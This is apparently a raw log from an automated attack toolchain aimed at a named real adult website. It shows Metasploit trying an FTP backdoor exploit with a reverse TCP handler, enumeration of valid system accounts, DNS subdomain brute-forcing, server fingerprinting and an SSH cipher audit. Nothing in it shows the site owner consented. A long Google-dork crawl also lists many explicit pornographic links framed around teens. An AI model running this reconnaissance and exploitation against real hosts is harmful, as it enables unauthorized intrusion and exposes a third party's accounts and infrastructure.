- #<Thread:0x000055b3b61386b0@/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
- : SELECT "hosts".* FROM "hosts" WHERE "hosts"."workspace_id" = $1 AND "hosts"."address" = $2 ORDER BY "hosts"."id" ASC LIMIT 1
- [*] vcteens.com:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] vcteens.com:21 - Banner: 220 FTP Server ready.
- [*] vcteens.com:21 - USER: 331 Password required for HFpN7W:)
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.185:4444
- [*] vcteens.com:21 - Sending Backdoor Command
- [-] vcteens.com:21 - Not backdoored
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- ftp is a valid user!
- mail is a valid user!
- mysql is a valid user!
- nobody is a valid user!
- postfix is a valid user!
- root is a valid user!
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:35 EDT
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.080s latency).
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: firewall|general purpose
- Running: Linux 2.4.X|2.6.X, ISS embedded
- OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
- OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
- , ,
- / \
- ((__---,,,---__))
- (_) O O (_)_________
- \ _ / |\
- o_o \ M S F | \
- \ _____ | *
- ||| WW|||
- ||| |||
- =[ metasploit v4.17.13-dev ]
- + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
- + -- --=[ 539 payloads - 42 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /brutex/wordlists/simple-users.txt
- RHOSTS => vcteens.com
- RHOST => vcteens.com
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:35 EDT
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.10s latency).
- PORT STATE SERVICE VERSION
- 53/tcp filtered domain
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: firewall|general purpose
- Running: Linux 2.4.X|2.6.X, ISS embedded
- OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
- OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
- Host script results:
- | dns-blacklist:
- | PROXY
- | dnsbl.tornevall.org - FAIL
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | admin.vcteens.com - 108.59.1.220
- | mail.vcteens.com - 108.59.1.220
- | www.vcteens.com - 108.59.1.220
- |_ ftp.vcteens.com - 108.59.1.220
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- #######################################################################################################################################
- ERROR:root:Site http://vcteens.com appears to be down
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://vcteens.com
- #######################################################################################################################################
- http://vcteens.com [200 OK] Country[UNITED STATES][US], IP[108.59.1.220], Meta-Refresh-Redirect[https://guardian2.skbroadband.com?flag=D&uid=?&pid=0&cid=0&host=vcteens.com&uri=2f]
- https://guardian2.skbroadband.com?flag=D&uid=?&pid=0&cid=0&host=vcteens.com&uri=2f [200 OK] Apache, Country[KOREA REPUBLIC OF][KR], HTTPServer[Apache], IP[218.232.19.190], PHP[4,4.4,4.4.2], Script[text/javascript], X-Powered-By[PHP/4.4.2]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://vcteens.com...
- __________________________________________ SITE INFO ___________________________________________
- IP Title
- 108.59.1.220 VCTeens.com - Teens Virtual Channel
- ___________________________________________ VERSION ____________________________________________
- Name Versions Type
- Apache 2.0.61 | 2.0.62 | 2.0.63 | 2.0.64 | 2.0.65 | 2.2.10 | 2.2.11 Platform
- 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 | 2.2.18
- 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24 | 2.2.25
- 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.2.6 | 2.2.7 | 2.2.8
- 2.2.9 | 2.3.0 | 2.3.1 | 2.3.10 | 2.3.11 | 2.3.12 | 2.3.13
- 2.3.14 | 2.3.15 | 2.3.16 | 2.3.2 | 2.3.3 | 2.3.4 | 2.3.5
- 2.3.6 | 2.3.7 | 2.3.8 | 2.3.9 | 2.4.0 | 2.4.1 | 2.4.10
- 2.4.11 | 2.4.12 | 2.4.2 | 2.4.3 | 2.4.4 | 2.4.5 | 2.4.6
- 2.4.7 | 2.4.8 | 2.4.9
- PHP 5.2.17 Platform
- nginx 1.9.5 Platform
- OpenBSD 4.9 OS
- ________________________________________________________________________________________________
- Time: 3.4 sec Urls: 953 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Server: nginx/1.9.5
- Date: Sat, 15 Sep 2018 21:47:47 GMT
- Content-Type: text/html
- Connection: keep-alive
- X-Powered-By: PHP/5.2.17
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [15-09-2018 19:37:54]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-vcteens.com.txt ]
- [ INFO ][ DORK ]::[ site:vcteens.com ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.lv ID: 003917828085772992913:gmoeray5sa8 ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 100 ]-[19:38:18] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 100 ]-[19:38:21] [ - ]
- |_[ + ] Target:: [ https://vcteens.com/?p=1 ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP:108.59.1.220:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 100 ]-[19:38:23] [ - ]
- |_[ + ] Target:: [ https://vcteens.com/?p=2 ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP:108.59.1.220:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 100 ]-[19:38:25] [ - ]
- |_[ + ] Target:: [ https://vcteens.com/?p=3 ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP:108.59.1.220:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 100 ]-[19:38:27] [ - ]
- |_[ + ] Target:: [ https://vcteens.com/index.php?tag=anal ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP:108.59.1.220:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 100 ]-[19:38:30] [ - ]
- |_[ + ] Target:: [ https://vcteens.com/index.php?tag=group ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP:108.59.1.220:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 100 ]-[19:38:32] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/signup.cgi ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 100 ]-[19:38:34] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=222&trade=http://virginbell.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 100 ]-[19:38:37] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=187&trade=http://19teenmovies.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 100 ]-[19:38:39] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=202&trade=http://xbobsvideos.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 100 ]-[19:38:41] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=78&trade=http://teenwi.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 100 ]-[19:38:43] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=128&trade=http://pillekosten.space/teranar/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 100 ]-[19:38:46] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=112&trade=http://www.fucksuckteens.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 13 / 100 ]-[19:38:48] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=193&trade=http://bestpornstarsex.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 14 / 100 ]-[19:38:50] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=213&trade=http://drunkxparty.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 15 / 100 ]-[19:38:53] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=96&trade=http://www.freshxxxflash.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 16 / 100 ]-[19:38:55] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=128&trade=http://pillolaprezzo.space/fluvoxamine/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 17 / 100 ]-[19:38:57] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=143&trade=http://youteenclips.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 18 / 100 ]-[19:39:00] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.tryteens.com/video/11112/mirabel2fyu/1008616/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 19 / 100 ]-[19:39:02] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x112x7152&s=60&u=http://galleries.whiteteensblackcocks.com/video/11309/ashtonghj/1008616/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 20 / 100 ]-[19:39:05] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x70x18350&s=60&u=http://www.artnudegalleries.com/cuteteen-pics/2113/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 21 / 100 ]-[19:39:07] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x161x16839&s=60&u=http://www.artnudegalleries.com/sexy-teens/2113/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 22 / 100 ]-[19:39:09] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x80x18303&s=60&u=http://www.artnudegalleries.com/lovely-teengirl/2113/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 23 / 100 ]-[19:39:12] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.teensexmania.com/448200628/?account=4932 ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 24 / 100 ]-[19:39:14] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=215&trade=http://www.teenbrothel.net/m16/cgi-bin/topsites.cgi?hitin=vcteens ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 25 / 100 ]-[19:39:15] [ - ]
- |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/22995/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: , , IP::0
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- |_[ + ] ERROR CONECTION:: Could not resolve host: www.vcteens.com
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 26 / 100 ]-[19:39:17] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x122x9114&s=60&u=http://galleries.pimproll.com/iam/vids/277/index.html?p=ft&r=pimp19582&j=13 ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 27 / 100 ]-[19:39:19] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=141&trade=http://teensexrealityporn.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 28 / 100 ]-[19:39:22] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=89&trade=http://teensgogo.net ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 29 / 100 ]-[19:39:24] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=142&trade=http://teensexfusionporn.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 30 / 100 ]-[19:39:26] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x151x563&s=60&u=http://galleries.payserve.com/1/37611/22314/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 31 / 100 ]-[19:39:29] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=203&trade=http://judyporn.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 32 / 100 ]-[19:39:31] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=30&trade=http://oldmanwish.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 33 / 100 ]-[19:39:33] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=169&trade=http://myshyteens.com ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
